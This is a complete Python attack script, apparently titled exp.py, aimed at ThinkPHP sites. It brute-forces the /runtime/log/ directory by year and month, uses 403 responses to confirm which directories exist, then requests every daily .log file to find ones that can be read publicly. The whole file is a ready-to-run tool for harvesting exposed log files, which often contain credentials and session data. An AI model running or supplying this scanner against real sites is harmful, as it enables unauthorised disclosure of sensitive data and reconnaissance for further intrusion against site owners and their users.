import requests,sys
# Month directories that answered HTTP 403 (exists, but listing is
# forbidden) — filled by dirscan(), consumed by the __main__ loop.
dirpath = []


def dirscan(url, year):
    """Probe <url>/runtime/log/<year><MM> for every month 01-12.

    ThinkPHP names its runtime log directories like ``201901``.  A 403
    response suggests the directory exists but listing is denied; each
    such URL is appended (with a trailing slash) to the module-level
    ``dirpath`` list for later per-day log probing.

    Args:
        url:  Base site URL, e.g. "http://example.com".
        year: Four-digit year string, e.g. "2019".
    """
    for month in range(1, 13):
        # %02d zero-pads the month, replacing the manual if/else branch.
        urls = url + '/runtime/log/' + year + '%02d' % month
        try:
            r = requests.get(urls, timeout=10)
        except requests.RequestException:
            # A timeout or connection error on one month must not abort
            # the whole scan (the original let it propagate and crash).
            continue
        if r.status_code == 403:
            print(urls)
            dirpath.append(urls + '/')
def logscan(url):
    """Probe <url><DD>.log for every day of the month (01-31).

    Prints every URL tried, and flags the ones that answer HTTP 200
    (i.e. a readable log file).

    Args:
        url: Log-directory URL ending in '/', e.g.
             "http://example.com/runtime/log/201901/".
    """
    # BUG FIX: the original used range(1, 30), which only tried days
    # 01-29 and silently skipped log files for days 30 and 31.
    for day in range(1, 32):
        # %02d zero-pads the day, replacing the manual if/else branch.
        urls = url + '%02d' % day + '.log'
        try:
            r = requests.get(urls, timeout=3)
        except requests.RequestException:
            # Best-effort: still report the attempted URL, keep going.
            print(urls)
            continue
        print(urls)
        if r.status_code == 200:
            print(urls + '--------------success log')
if __name__ == '__main__':
    # Explicit argument check instead of the original bare ``except:``,
    # which swallowed *every* error (real bugs, network failures,
    # Ctrl-C) and misreported them all as a usage mistake.
    if len(sys.argv) != 3:
        print("[*] python exp.py http://example.com/ year")
        print("[*] python exp.py http://test.com/ 2019")
        sys.exit(1)
    url = sys.argv[1]
    year = sys.argv[2]
    print('[*]scan:' + url + ' year:' + year)
    # dirscan() fills the module-level ``dirpath`` list with month
    # directories that responded 403; probe each for per-day logs.
    dirscan(url, year)
    for path in dirpath:
        logscan(path)